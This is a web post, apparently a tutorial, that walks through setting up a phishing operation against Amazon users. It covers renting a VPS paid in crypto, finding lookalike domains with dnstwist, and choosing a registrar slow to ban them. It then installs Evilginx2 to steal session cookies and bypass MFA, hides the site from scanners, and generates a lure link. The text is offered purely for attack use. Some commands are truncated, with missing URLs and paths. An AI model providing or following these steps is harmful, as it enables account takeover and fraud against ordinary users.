How To Setup Email Server For Spamming And Phishing Easy To Setup 2024

Tom Cruise

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Step1: Get a server
The first step for any phishing campaign is acquiring a relatively cheap VPS to host your page. The best place for this is in my opinion. They let you pay with crypto currency (although not XMR sadly) so that's good, and the prices are really cheap. For your os, Chose Debian as that will work the best for this.

Step2: Get a phishing domain
In order to figure out what some phishing domains are, i recommend installing dnstwist on a kali machine and running the domain of the site your using in your attack through it to find available domains. I reccomend using namecheap to buy your domain as they have fairly cheap prices and wont ban it quickly which is always neat.

Step3: (time to type): Installing Evilginx2

First off, Evilginx2 is a MiTM phishing framework what also steals session cookies, which can be used to bypass MFA.

To install this we need to run the follwoing
First, Make sure wget is installed.

sudo apt update
sudo apt install wget -y

Next, we need to install Go.

Now we install Go.
sudo tar -zxvf go1.17.linux-amd64.tar.gz -C /usr/local/

Next, we configure PATH
echo "export PATH=/usr/local/go/bin:${PATH}" | sudo tee /etc/profile.d/
source /etc/profile.d/

Now we install Evilginx. I prefer this repo as it already as phishlets and saves you some time of hunting down/ Making your own.

sudo apt-get -y install git make
git clone
cd evilginx2

After this, Install Globally.
sudo make install

And now run.
sudo evilginx

Step4 Create Page.
Upon running. you will see a list of pages that are all disabled, pick your page of choice, but first we need to configure Evilginx so that we dont have problems

config domain <yourdomain>
config ip <yourIP>
blacklist unauth

The blacklist command is to block your site from scanners. YOU WANT TO DO THIS.
Next, pick your phishlet(phishing page) of choice

phishlets hostname amazon <your domain name>
phishlets enable amazon

Now its time to setup our lure for this site. This is the actual phishing page its self.

lures create amazon
lures edit 0 redirect_url
lures get-url 0

After running lures get-url 0 you should see a link appear on screen, this is your phishing link.